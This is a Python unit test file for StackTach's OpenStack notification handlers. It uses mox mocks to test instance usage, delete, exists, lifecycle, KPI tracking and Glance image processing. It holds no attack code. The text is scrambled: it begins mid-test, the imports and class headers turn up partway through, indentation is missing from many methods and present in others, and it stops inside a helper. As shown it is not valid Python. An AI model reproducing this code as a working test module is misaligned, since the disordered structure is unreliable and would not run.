self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.assertEquals(usage.instance_flavor_id, INSTANCE_FLAVOR_ID_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_resize_prep_start_when_no_launched_at_in_db(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.resize.prep.start'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
usage.launched_at = None
views._process_usage_for_new_launch(raw, notification)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_resize_revert_start_when_no_launched_at_in_db(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.resize.revert.start'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_resize_prep_start_when_launched_at_in_db(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.resize.prep.start'
orig_launched_at = utils.decimal_utc(DUMMY_TIME - datetime.timedelta(days=1))
usage = self.mox.CreateMockAnything()
usage.launched_at = orig_launched_at
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEqual(usage.launched_at, orig_launched_at)
self.assertEqual(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_new_launch_rescue_start_when_launched_at_in_db(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.rescue.start'
orig_launched_at = utils.decimal_utc(DUMMY_TIME - datetime.timedelta(days=1))
usage = self.mox.CreateMockAnything()
usage.launched_at = orig_launched_at
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_new_launch(raw, notification)
self.assertEqual(usage.launched_at, orig_launched_at)
self.assertEqual(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_create_end(self):
notification = self._create_mock_notification()
notification.message = 'Success'
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.create.end'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEqual(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_rescue_end(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.rescue.end'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEqual(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_create_end_success_message(self):
notification = self._create_mock_notification()
notification.message = 'Success'
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.create.end'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEqual(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_create_end_error_message(self):
notification = self.mox.CreateMockAnything()
notification.message = 'Error'
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.create.end'
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.mox.VerifyAll()
def test_process_usage_for_updates_revert_end(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.resize.revert.end'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEqual(usage.launched_at, utils.decimal_utc(DUMMY_TIME))
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_finish_resize_start(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.finish_resize.start'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
usage.instance_type_id = INSTANCE_TYPE_ID_2
usage.instance_flavor_id = INSTANCE_FLAVOR_ID_2
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEqual(usage.instance_flavor_id, INSTANCE_FLAVOR_ID_1)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
def test_process_usage_for_updates_finish_resize_end(self):
notification = self._create_mock_notification()
raw = self.mox.CreateMockAnything()
raw.event = 'compute.instance.finish_resize.end'
usage = self.mox.CreateMockAnything()
usage.launched_at = None
usage.instance_type_id = INSTANCE_TYPE_ID_2
usage.instance_flavor_id = INSTANCE_FLAVOR_ID_2
views.STACKDB.get_or_create_instance_usage(instance=INSTANCE_ID_1,
request_id=REQUEST_ID_1) \
.AndReturn((usage, True))
views.STACKDB.save(usage)
self.mox.ReplayAll()
views._process_usage_for_updates(raw, notification)
self.assertEqual(usage.instance_type_id, INSTANCE_TYPE_ID_1)
self.assertEqual(usage.instance_flavor_id, INSTANCE_FLAVOR_ID_1)
self.assertEquals(usage.tenant, TENANT_ID_1)
self.assertEquals(usage.os_architecture, OS_ARCH_1)
self.assertEquals(usage.os_version, OS_VERSION_1)
self.assertEquals(usage.os_distro, OS_DISTRO_1)
self.assertEquals(usage.rax_options, RAX_OPTIONS_1)
self.mox.VerifyAll()
    def test_process_delete(self):
        """_process_delete persists an InstanceDeletes row from the notification.

        The fixture carries both deleted_at and terminated_at; the expected row
        uses deleted_at (NOTE(review): precedence inferred from the fixture —
        confirm against views._process_delete).
        """
        delete_time = datetime.datetime.utcnow()
        terminated_time = delete_time-datetime.timedelta(seconds=1)
        launch_time = delete_time-datetime.timedelta(days=1)
        launch_decimal = utils.decimal_utc(launch_time)
        delete_decimal = utils.decimal_utc(delete_time)
        notification = self.mox.CreateMockAnything()
        notification.instance = INSTANCE_ID_1
        notification.deleted_at = str(delete_time)
        notification.terminated_at = str(terminated_time)
        notification.launched_at = str(launch_time)
        raw = self.mox.CreateMockAnything()
        delete = self.mox.CreateMockAnything()
        delete.instance = INSTANCE_ID_1
        delete.launched_at = launch_decimal
        delete.deleted_at = delete_decimal
        views.STACKDB.get_or_create_instance_delete(
            instance=INSTANCE_ID_1, deleted_at=delete_decimal,
            launched_at=launch_decimal)\
            .AndReturn((delete, True))
        views.STACKDB.save(delete)
        self.mox.ReplayAll()
        views._process_delete(raw, notification)
        self.assertEqual(delete.instance, INSTANCE_ID_1)
        self.assertEqual(delete.launched_at, launch_decimal)
        self.assertEqual(delete.deleted_at, delete_decimal)
        self.mox.VerifyAll()
    def test_process_delete_with_only_terminated_at(self):
        """With an empty deleted_at, terminated_at supplies the delete timestamp."""
        delete_time = datetime.datetime.utcnow()
        launch_time = delete_time-datetime.timedelta(days=1)
        launch_decimal = utils.decimal_utc(launch_time)
        delete_decimal = utils.decimal_utc(delete_time)
        notification = self.mox.CreateMockAnything()
        notification.instance = INSTANCE_ID_1
        # deleted_at is blank, so the handler falls back to terminated_at.
        notification.deleted_at = ''
        notification.terminated_at = str(delete_time)
        notification.launched_at = str(launch_time)
        raw = self.mox.CreateMockAnything()
        delete = self.mox.CreateMockAnything()
        delete.instance = INSTANCE_ID_1
        delete.launched_at = launch_decimal
        delete.deleted_at = delete_decimal
        views.STACKDB.get_or_create_instance_delete(
            instance=INSTANCE_ID_1, deleted_at=delete_decimal,
            launched_at=launch_decimal)\
            .AndReturn((delete, True))
        views.STACKDB.save(delete)
        self.mox.ReplayAll()
        views._process_delete(raw, notification)
        self.assertEqual(delete.instance, INSTANCE_ID_1)
        self.assertEqual(delete.launched_at, launch_decimal)
        self.assertEqual(delete.deleted_at, delete_decimal)
        self.mox.VerifyAll()
    def test_process_delete_with_neither(self):
        """NOTE(review): name says 'neither', but terminated_at IS set below,
        making this byte-identical to test_process_delete_with_only_terminated_at.
        Likely either terminated_at should also be '' here or the test is a
        duplicate — confirm intent before changing behavior.
        """
        delete_time = datetime.datetime.utcnow()
        launch_time = delete_time-datetime.timedelta(days=1)
        launch_decimal = utils.decimal_utc(launch_time)
        delete_decimal = utils.decimal_utc(delete_time)
        notification = self.mox.CreateMockAnything()
        notification.instance = INSTANCE_ID_1
        notification.deleted_at = ''
        notification.terminated_at = str(delete_time)
        notification.launched_at = str(launch_time)
        raw = self.mox.CreateMockAnything()
        delete = self.mox.CreateMockAnything()
        delete.instance = INSTANCE_ID_1
        delete.launched_at = launch_decimal
        delete.deleted_at = delete_decimal
        views.STACKDB.get_or_create_instance_delete(
            instance=INSTANCE_ID_1, deleted_at=delete_decimal,
            launched_at=launch_decimal)\
            .AndReturn((delete, True))
        views.STACKDB.save(delete)
        self.mox.ReplayAll()
        views._process_delete(raw, notification)
        self.assertEqual(delete.instance, INSTANCE_ID_1)
        self.assertEqual(delete.launched_at, launch_decimal)
        self.assertEqual(delete.deleted_at, delete_decimal)
        self.mox.VerifyAll()
    def test_process_delete_no_launch(self):
        """An empty launched_at must be ignored — no STACKDB calls expected."""
        delete_time = datetime.datetime.utcnow()
        notification = self.mox.CreateMockAnything()
        notification.instance = INSTANCE_ID_1
        notification.deleted_at = str(delete_time)
        notification.launched_at = ''
        raw = self.mox.CreateMockAnything()
        # No expectations recorded: any DB access would fail VerifyAll().
        self.mox.ReplayAll()
        views._process_delete(raw, notification)
        self.mox.VerifyAll()
def _create_exists_notification(self, audit_beginning, current_time,
launch_time, deleted_time):
notification = self.mox.CreateMockAnything()
notification.launched_at = str(launch_time)
notification.deleted_at = str(deleted_time)
notification.audit_period_beginning = str(audit_beginning)
notification.audit_period_ending = str(current_time)
notification.tenant = TENANT_ID_1
notification.os_architecture = OS_ARCH_1
notification.os_version = OS_VERSION_1
notification.os_distro = OS_DISTRO_1
notification.rax_options = RAX_OPTIONS_1
notification.instance = INSTANCE_ID_1
notification.instance_type_id = INSTANCE_TYPE_ID_1
notification.instance_flavor_id = INSTANCE_FLAVOR_ID_1
notification.message_id = MESSAGE_ID_1
notification.bandwidth_public_out = BANDWIDTH_PUBLIC_OUTBOUND
return notification
    def test_process_exists(self):
        """A .exists without deleted_at creates an InstanceExists row."""
        current_time = datetime.datetime.utcnow()
        launch_time = current_time - datetime.timedelta(hours=23)
        launch_decimal = utils.decimal_utc(launch_time)
        audit_beginning = current_time - datetime.timedelta(hours=20)
        audit_beginning_decimal = utils.decimal_utc(audit_beginning)
        audit_ending_decimal = utils.decimal_utc(current_time)
        notification = self._create_exists_notification(
            audit_beginning, current_time, launch_time, deleted_time='')
        raw = self.mox.CreateMockAnything()
        usage = self.mox.CreateMockAnything()
        # The matching usage is looked up within one second of the launch time.
        launched_range = (launch_decimal, launch_decimal+1)
        views.STACKDB.get_instance_usage(
            instance=INSTANCE_ID_1,
            launched_at__range=launched_range).AndReturn(usage)
        exists_values = {
            'message_id': MESSAGE_ID_1,
            'instance': INSTANCE_ID_1,
            'launched_at': launch_decimal,
            'audit_period_beginning': audit_beginning_decimal,
            'audit_period_ending': audit_ending_decimal,
            'instance_type_id': INSTANCE_TYPE_ID_1,
            'instance_flavor_id': INSTANCE_FLAVOR_ID_1,
            'usage': usage,
            'raw': raw,
            'tenant': TENANT_ID_1,
            'rax_options': RAX_OPTIONS_1,
            'os_architecture': OS_ARCH_1,
            'os_version': OS_VERSION_1,
            'os_distro': OS_DISTRO_1,
            'bandwidth_public_out': BANDWIDTH_PUBLIC_OUTBOUND
        }
        exists = self.mox.CreateMockAnything()
        views.STACKDB.create_instance_exists(**exists_values).AndReturn(exists)
        views.STACKDB.save(exists)
        self.mox.ReplayAll()
        views._process_exists(raw, notification)
        self.mox.VerifyAll()
    def test_process_exists_no_launched_at(self):
        """Exists events without launched_at are skipped with a warning log."""
        notification = self.mox.CreateMockAnything()
        notification.instance = INSTANCE_ID_1
        notification.launched_at = None
        raw = self.mox.CreateMockAnything()
        raw.id = '1'
        # Expect exactly this warning; no STACKDB expectations are recorded.
        self.setup_mock_log()
        self.log.warn('Ignoring exists without launched_at. RawData(1)')
        self.mox.ReplayAll()
        views._process_exists(raw, notification)
        self.mox.VerifyAll()
    def test_process_exists_with_deleted_at(self):
        """A .exists with deleted_at also links the matching InstanceDeletes row."""
        current_time = datetime.datetime.utcnow()
        launch_time = current_time - datetime.timedelta(hours=23)
        launch_decimal = utils.decimal_utc(launch_time)
        delete_time = datetime.datetime.utcnow()
        deleted_decimal = utils.decimal_utc(delete_time)
        audit_beginning = current_time - datetime.timedelta(hours=20)
        audit_beginning_decimal = utils.decimal_utc(audit_beginning)
        audit_ending_decimal = utils.decimal_utc(current_time)
        notification = self._create_exists_notification(
            audit_beginning, current_time, launch_time, delete_time)
        raw = self.mox.CreateMockAnything()
        usage = self.mox.CreateMockAnything()
        # Both the usage and the delete are matched by launch time (+1s window).
        launched_range = (launch_decimal, launch_decimal+1)
        views.STACKDB.get_instance_usage(instance=INSTANCE_ID_1,
                                         launched_at__range=launched_range)\
            .AndReturn(usage)
        delete = self.mox.CreateMockAnything()
        views.STACKDB.get_instance_delete(instance=INSTANCE_ID_1,
                                          launched_at__range=launched_range)\
            .AndReturn(delete)
        exists_values = {
            'message_id': MESSAGE_ID_1,
            'instance': INSTANCE_ID_1,
            'launched_at': launch_decimal,
            'deleted_at': deleted_decimal,
            'audit_period_beginning': audit_beginning_decimal,
            'audit_period_ending': audit_ending_decimal,
            'instance_type_id': INSTANCE_TYPE_ID_1,
            'instance_flavor_id': INSTANCE_FLAVOR_ID_1,
            'usage': usage,
            'delete': delete,
            'raw': raw,
            'tenant': TENANT_ID_1,
            'rax_options': RAX_OPTIONS_1,
            'os_architecture': OS_ARCH_1,
            'os_version': OS_VERSION_1,
            'os_distro': OS_DISTRO_1,
            'bandwidth_public_out': BANDWIDTH_PUBLIC_OUTBOUND
        }
        exists = self.mox.CreateMockAnything()
        views.STACKDB.create_instance_exists(**exists_values).AndReturn(exists)
        views.STACKDB.save(exists)
        self.mox.ReplayAll()
        views._process_exists(raw, notification)
        self.mox.VerifyAll()
class StacktachImageUsageParsingTestCase(StacktachBaseTestCase):
    """Glance handlers should simply delegate to the notification object."""

    def setUp(self):
        self.mox = mox.Mox()
        views.STACKDB = self.mox.CreateMockAnything()

    def tearDown(self):
        self.mox.UnsetStubs()

    def test_save_image_usage(self):
        """_process_glance_usage calls notification.save_usage(raw)."""
        raw = self.mox.CreateMockAnything()
        notification = self.mox.CreateMockAnything()
        notification.save_usage(raw)
        self.mox.ReplayAll()
        views._process_glance_usage(raw, notification)
        self.mox.VerifyAll()

    def test_save_image_delete(self):
        """_process_glance_delete calls notification.save_delete(raw)."""
        raw = self.mox.CreateMockAnything()
        notification = self.mox.CreateMockAnything()
        notification.save_delete(raw)
        self.mox.ReplayAll()
        views._process_glance_delete(raw, notification)
        self.mox.VerifyAll()

    def test_save_image_exists(self):
        """_process_glance_exists calls notification.save_exists(raw)."""
        raw = self.mox.CreateMockAnything()
        notification = self.mox.CreateMockAnything()
        notification.save_exists(raw)
        self.mox.ReplayAll()
        views._process_glance_exists(raw, notification)
        self.mox.VerifyAll()


import datetime
import json
import mox
import utils
from utils import BANDWIDTH_PUBLIC_OUTBOUND
from utils import INSTANCE_FLAVOR_ID_1
from utils import INSTANCE_FLAVOR_ID_2
from utils import INSTANCE_ID_1
from utils import OS_VERSION_1
from utils import OS_ARCH_1
from utils import OS_DISTRO_1
from utils import RAX_OPTIONS_1
from utils import MESSAGE_ID_1
from utils import REQUEST_ID_1
from utils import TENANT_ID_1
from utils import INSTANCE_TYPE_ID_1
from utils import DUMMY_TIME
from utils import INSTANCE_TYPE_ID_2
from stacktach import stacklog, models
from stacktach import notification
from stacktach import views
from tests.unit import StacktachBaseTestCase
class StacktachRawParsingTestCase(StacktachBaseTestCase):
    """Tests for views.process_raw_data notification parsing and persistence."""

    def setUp(self):
        self.mox = mox.Mox()
        views.STACKDB = self.mox.CreateMockAnything()

    def tearDown(self):
        self.mox.UnsetStubs()

    def assertOnHandlerResponse(self, resp, **kwargs):
        """Assert each keyword appears in resp with the expected value."""
        for key in kwargs:
            self.assertTrue(key in resp, msg='%s not in response' % key)
            self.assertEqual(resp[key], kwargs[key])

    def test_process_raw_data(self):
        """process_raw_data saves the notification and returns (record, notification)."""
        deployment = self.mox.CreateMockAnything()
        when = '2013-1-25 13:38:23.123'
        # Renamed from 'dict' — that name shadowed the builtin.
        payload = {
            'timestamp': when,
        }
        routing_key = 'monitor.info'
        args = (routing_key, payload)
        json_args = json.dumps(args)
        mock_record = self.mox.CreateMockAnything()
        mock_notification = self.mox.CreateMockAnything()
        mock_notification.save().AndReturn(mock_record)
        self.mox.StubOutWithMock(notification, 'notification_factory')
        exchange = 'nova'
        notification.notification_factory(payload, deployment, routing_key,
                                          json_args, exchange).AndReturn(
            mock_notification)
        self.mox.ReplayAll()
        self.assertEqual(
            views.process_raw_data(deployment, args, json_args, exchange),
            (mock_record, mock_notification))
        self.mox.VerifyAll()

    def test_process_raw_data_old_timestamp(self):
        """Old-style '_context_timestamp' payloads are parsed and saved too."""
        deployment = self.mox.CreateMockAnything()
        when = '2013-1-25T13:38:23.123'
        payload = {
            '_context_timestamp': when,
        }
        routing_key = 'monitor.info'
        args = ('monitor.info', payload)
        json_args = json.dumps(args[1])
        mock_notification = self.mox.CreateMockAnything()
        mock_notification.save()
        self.mox.StubOutWithMock(notification, 'notification_factory')
        exchange = 'nova'
        notification.notification_factory(payload, deployment, routing_key,
                                          json_args, exchange).AndReturn(mock_notification)
        self.mox.ReplayAll()
        views.process_raw_data(deployment, args, json_args, exchange)
        self.mox.VerifyAll()
class StacktachLifecycleTestCase(StacktachBaseTestCase):
    """Tests for lifecycle aggregation and KPI request tracking in views."""
    def setUp(self):
        self.mox = mox.Mox()
        views.STACKDB = self.mox.CreateMockAnything()
    def tearDown(self):
        self.mox.UnsetStubs()
    def test_start_kpi_tracking_not_update(self):
        # Only 'compute.instance.update' events may start KPI tracking.
        raw = self.mox.CreateMockAnything()
        raw.event = 'compute.instance.create.start'
        self.mox.ReplayAll()
        views.start_kpi_tracking(None, raw)
        self.mox.VerifyAll()
    def test_start_kpi_tracking_not_from_api(self):
        # Updates from non-API services are ignored.
        raw = self.mox.CreateMockAnything()
        raw.event = 'compute.instance.update'
        raw.service = 'compute'
        self.mox.ReplayAll()
        views.start_kpi_tracking(None, raw)
        self.mox.VerifyAll()
    def test_start_kpi_tracking(self):
        # An API-originated update creates and saves a request tracker.
        lifecycle = self.mox.CreateMockAnything()
        tracker = self.mox.CreateMockAnything()
        when = utils.decimal_utc()
        raw = utils.create_raw(self.mox, when, 'compute.instance.update',
                               host='nova.example.com', service='api')
        views.STACKDB.create_request_tracker(lifecycle=lifecycle,
                                             request_id=REQUEST_ID_1,
                                             start=when,
                                             last_timing=None,
                                             duration=str(0.0))\
            .AndReturn(tracker)
        views.STACKDB.save(tracker)
        self.mox.ReplayAll()
        views.start_kpi_tracking(lifecycle, raw)
        self.mox.VerifyAll()
    def test_start_kpi_tracking_not_using_host(self):
        # Service (not hostname) decides API origin: 'compute' service is ignored
        # even with an api-looking host.
        lifecycle = self.mox.CreateMockAnything()
        tracker = self.mox.CreateMockAnything()
        when = utils.decimal_utc()
        raw = utils.create_raw(self.mox, when, 'compute.instance.update',
                               host='api.example.com', service='compute')
        self.mox.ReplayAll()
        views.start_kpi_tracking(lifecycle, raw)
        self.mox.VerifyAll()
    def test_update_kpi_no_trackers(self):
        # With no trackers for the request, update_kpi is a no-op.
        raw = self.mox.CreateMockAnything()
        raw.request_id = REQUEST_ID_1
        views.STACKDB.find_request_trackers(request_id=REQUEST_ID_1)\
            .AndReturn([])
        self.mox.ReplayAll()
        views.update_kpi(None, raw)
        self.mox.VerifyAll()
    def test_update_kpi(self):
        # An existing tracker is updated with the latest timing and duration.
        lifecycle = self.mox.CreateMockAnything()
        end = utils.decimal_utc()
        raw = self.mox.CreateMockAnything()
        raw.request_id = REQUEST_ID_1
        raw.when=end
        timing = utils.create_timing(self.mox, 'compute.instance.create',
                                     lifecycle, end_when=end)
        start = utils.decimal_utc()
        tracker = utils.create_tracker(self.mox, REQUEST_ID_1, lifecycle,
                                       start)
        views.STACKDB.find_request_trackers(request_id=REQUEST_ID_1)\
            .AndReturn([tracker])
        views.STACKDB.save(tracker)
        self.mox.ReplayAll()
        views.update_kpi(timing, raw)
        self.assertEqual(tracker.request_id, REQUEST_ID_1)
        self.assertEqual(tracker.lifecycle, lifecycle)
        self.assertEqual(tracker.last_timing, timing)
        self.assertEqual(tracker.start, start)
        self.assertEqual(tracker.duration, end-start)
        self.mox.VerifyAll()
    def test_aggregate_lifecycle_no_instance(self):
        # Raw data without an instance id is ignored entirely.
        raw = self.mox.CreateMockAnything()
        raw.instance = None
        self.mox.ReplayAll()
        views.aggregate_lifecycle(raw)
        self.mox.VerifyAll()
    def test_aggregate_lifecycle_start(self):
        # A .start event creates a lifecycle and opens a timing record.
        event_name = 'compute.instance.create'
        event = '%s.start' % event_name
        when = datetime.datetime.utcnow()
        raw = utils.create_raw(self.mox, when, event, state='building')
        views.STACKDB.find_lifecycles(instance=INSTANCE_ID_1).AndReturn([])
        lifecycle = self.mox.CreateMockAnything()
        lifecycle.instance = INSTANCE_ID_1
        views.STACKDB.create_lifecycle(instance=INSTANCE_ID_1)\
            .AndReturn(lifecycle)
        views.STACKDB.save(lifecycle)
        views.STACKDB.find_timings(name=event_name, lifecycle=lifecycle)\
            .AndReturn([])
        timing = utils.create_timing(self.mox, event_name, lifecycle)
        views.STACKDB.create_timing(lifecycle=lifecycle, name=event_name)\
            .AndReturn(timing)
        views.STACKDB.save(timing)
        self.mox.ReplayAll()
        views.aggregate_lifecycle(raw)
        self.assertEqual(lifecycle.last_raw, raw)
        self.assertEqual(lifecycle.last_state, 'building')
        self.assertEqual(lifecycle.last_task_state, '')
        self.assertEqual(timing.name, event_name)
        self.assertEqual(timing.lifecycle, lifecycle)
        self.assertEqual(timing.start_raw, raw)
        self.assertEqual(timing.start_when, when)
        self.mox.VerifyAll()
    def test_aggregate_lifecycle_end(self):
        # A .end event closes the open timing and triggers KPI update.
        event_name = 'compute.instance.create'
        # NOTE(review): start_event is built from '.end' (same as end_event);
        # '%s.start' looks intended — confirm before changing.
        start_event = '%s.end' % event_name
        end_event = '%s.end' % event_name
        start_when = datetime.datetime.utcnow()
        end_when = datetime.datetime.utcnow()
        start_raw = utils.create_raw(self.mox, start_when, start_event,
                                     state='building')
        end_raw = utils.create_raw(self.mox, end_when, end_event,
                                   old_task='build')
        lifecycle = utils.create_lifecycle(self.mox, INSTANCE_ID_1,
                                           'active', '', start_raw)
        views.STACKDB.find_lifecycles(instance=INSTANCE_ID_1)\
            .AndReturn([lifecycle])
        views.STACKDB.save(lifecycle)
        timing = utils.create_timing(self.mox, event_name, lifecycle,
                                     start_raw=start_raw,
                                     start_when=start_when)
        views.STACKDB.find_timings(name=event_name, lifecycle=lifecycle)\
            .AndReturn([timing])
        self.mox.StubOutWithMock(views, "update_kpi")
        views.update_kpi(timing, end_raw)
        views.STACKDB.save(timing)
        self.mox.ReplayAll()
        views.aggregate_lifecycle(end_raw)
        self.assertEqual(lifecycle.last_raw, end_raw)
        self.assertEqual(lifecycle.last_state, 'active')
        self.assertEqual(lifecycle.last_task_state, 'build')
        self.assertEqual(timing.name, event_name)
        self.assertEqual(timing.lifecycle, lifecycle)
        self.assertEqual(timing.start_raw, start_raw)
        self.assertEqual(timing.start_when, start_when)
        self.assertEqual(timing.end_raw, end_raw)
        self.assertEqual(timing.end_when, end_when)
        self.assertEqual(timing.diff, end_when-start_when)
        self.mox.VerifyAll()
    def test_aggregate_lifecycle_update(self):
        # An update event creates a lifecycle and starts KPI tracking.
        event = 'compute.instance.update'
        when = datetime.datetime.utcnow()
        raw = utils.create_raw(self.mox, when, event, old_task='reboot')
        views.STACKDB.find_lifecycles(instance=INSTANCE_ID_1).AndReturn([])
        lifecycle = self.mox.CreateMockAnything()
        lifecycle.instance = INSTANCE_ID_1
        views.STACKDB.create_lifecycle(instance=INSTANCE_ID_1).AndReturn(lifecycle)
        views.STACKDB.save(lifecycle)
        self.mox.StubOutWithMock(views, "start_kpi_tracking")
        views.start_kpi_tracking(lifecycle, raw)
        self.mox.ReplayAll()
        views.aggregate_lifecycle(raw)
        self.assertEqual(lifecycle.last_raw, raw)
        self.assertEqual(lifecycle.last_state, 'active')
        self.assertEqual(lifecycle.last_task_state, 'reboot')
        self.mox.VerifyAll()
class StacktachUsageParsingTestCase(StacktachBaseTestCase):
    def setUp(self):
        self.mox = mox.Mox()
        views.STACKDB = self.mox.CreateMockAnything()
        # Stub stacklog.get_logger so tests can expect warning calls on self.log.
        self.log = self.mox.CreateMockAnything()
        self.mox.StubOutWithMock(stacklog, 'get_logger')
    def tearDown(self):
        # Restore stacklog.get_logger and any other stubs set during the test.
        self.mox.UnsetStubs()
def setup_mock_log(self, name=None):
if name is None:
stacklog.get_logger(name=mox.IgnoreArg(),
is_parent=False).AndReturn(self.log)
else:
stacklog.get_logger(name=name,
is_parent=False).AndReturn(self.log)
def test_all_instance_events_have_mapping(self):
for key, value in views.INSTANCE_EVENT.items():
msg = "'%s' does not have a process function mapping." % value
self.assertTrue(value in views.USAGE_PROCESS_MAPPING, msg)
    def _create_mock_notification(self):
        """Build a mock usage notification populated with the shared fixtures."""
        notification = self.mox.CreateMockAnything()
        notification.launched_at = str(DUMMY_TIME)
        notification.tenant = TENANT_ID_1
        notification.rax_options = RAX_OPTIONS_1
        notification.os_architecture = OS_ARCH_1
        notification.os_version = OS_VERSION_1
        notification.os_distro = OS_DISTRO_1
        notification.instance = INSTANCE_ID_1
        notification.request_id = REQUEST_ID_1
        notification.instance_type_id = INSTANCE_TYPE_ID_1
